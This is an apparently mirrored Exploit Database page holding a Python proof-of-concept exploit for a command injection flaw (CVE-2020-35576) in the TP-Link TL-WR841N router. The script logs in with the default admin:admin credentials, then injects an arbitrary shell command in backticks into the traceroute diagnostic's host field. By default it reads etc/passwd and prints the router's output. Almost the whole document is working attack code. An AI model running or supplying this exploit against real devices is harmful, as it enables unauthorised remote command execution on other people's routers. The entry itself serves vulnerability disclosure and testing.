TP-Link TL-WR841N – Command Injection

• Exploit Database
• 11 阅读

• 作者： Koh You Liang
  日期： 2021-06-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50058/

• # Exploit Title: TP-Link TL-WR841N - Command Injection
  # Date: 2020-12-13
  # Exploit Author: Koh You Liang
  # Vendor Homepage: https://www.tp-link.com/
  # Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
  # Version: TL-WR841N 0.9.1 4.0
  # Tested on: Windows 10
  # CVE : CVE-2020-35576
  
  import requests
  import sys
  import time
  
  try:
  _ = sys.argv[2]
  payload = ' '.join(sys.argv[1:])
  except IndexError:
  try:
  payload = sys.argv[1]
  except IndexError:
  print("[*] Command not specified, using the default `cat etc/passwd=`")
  payload = 'cat etc/passwd'
  
  # Default credentials is admin:admin - replace with your own
  cookies = {
  'Authorization': 'Basic YWRtaW46YWRtaW4='
  }
  
  headers = {
  'Host': '192.168.0.1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',
  'Accept': '*/*',
  'Accept-Language': 'en-US,en;q=0.5',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'text/plain',
  'Content-Length': '197',
  'Origin': 'http://192.168.0.1',
  'Connection': 'close',
  'Referer': 'http://192.168.0.1/mainFrame.htm',
  }
  
  data1 = \
  '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
  response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
  print('[+] Sending payload...')
  
  try:
  response1.text.splitlines()[0]
  except IndexError:
  sys.exit('[-] Cannot get response. Please check your cookie.')
  if response1.text.splitlines()[0] != '[error]0':
  sys.exit('[*] Router/Firmware is not vulnerable.')
  
  data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
  response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
  print('[+] Receiving response from router...')
  time.sleep(0.8) # Buffer time for traceroute to succeed
  
  data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
  response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)
  
  if '=:' in response3.text.splitlines()[3]:
  print('[-] Command not supported.')
  else:
  print('[+] Exploit successful!')
  for line_number, line in enumerate(response3.text.splitlines()):
  try:
  if line_number == 3:
  print(line[12:])
  if line_number > 3 and line != '[error]0':
  print(line)
  if 'not known' in line:
  break
  except IndexError:
  break